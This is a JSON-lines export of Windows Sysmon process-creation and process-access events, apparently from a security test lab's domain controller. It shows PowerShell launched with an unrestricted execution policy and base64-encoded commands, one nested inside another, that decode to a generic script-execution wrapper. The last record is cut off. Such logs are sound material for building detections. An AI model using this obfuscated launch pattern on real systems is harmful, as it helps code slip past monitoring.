{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":8522,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.936\r\nProcessGuid: {41C8662E-22D1-5F25-0000-0010A6BE1100}\r\nProcessId: 3408\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-22D1-5F25-0000-00205EAC1100}\r\nLogonId: 0x11AC5E\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {41C8662E-22D1-5F25-0000-0010DDB01100}\r\nParentProcessId: 5016\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.936","ProcessGuid":"{41C8662E-22D1-5F25-0000-0010A6BE1100}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-22D1-5F25-0000-00205EAC1100}","LogonId":"0x11ac5e","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{41C8662E-22D1-5F25-0000-0010DDB01100}","ParentProcessId":"5016","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","EventReceivedTime":"2020-08-01 08:07:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8523,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.928\r\nSourceProcessGUID: {41C8662E-22D1-5F25-0000-0010DDB01100}\r\nSourceProcessId: 5016\r\nSourceThreadId: 3776\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-22BF-5F25-0000-00109C5D1100}\r\nTargetProcessId: 3408\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fabf95bb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fa09a695|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fa09a366|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fab4b77b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fa05aefc|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fa0b93cb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fa09ca30|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fa09ca30|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fa09c8c1|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fa08e846|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fa09ad79|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fa09a96c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fa09a695|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fa09a366|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fab4b77b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fa0811c7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fa080797","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.928","SourceProcessGUID":"{41C8662E-22D1-5F25-0000-0010DDB01100}","SourceProcessId":"5016","SourceThreadId":"3776","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-22BF-5F25-0000-00109C5D1100}","TargetProcessId":"3408","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fabf95bb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fa09a695|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fa09a366|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fab4b77b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fa05aefc|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fa0b93cb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fa09ca30|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fa09ca30|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fa09c8c1|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fa08e846|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fa09ad79|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fa09a96c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fa09a695|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fa09a366|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fab4b77b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fa0811c7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fa080797","EventReceivedTime":"2020-08-01 08:07:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8524,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.928\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22BF-5F25-0000-00109C5D1100}\r\nTargetProcessId: 3408\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.928","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22BF-5F25-0000-00109C5D1100}","TargetProcessId":"3408","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8525,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.928\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 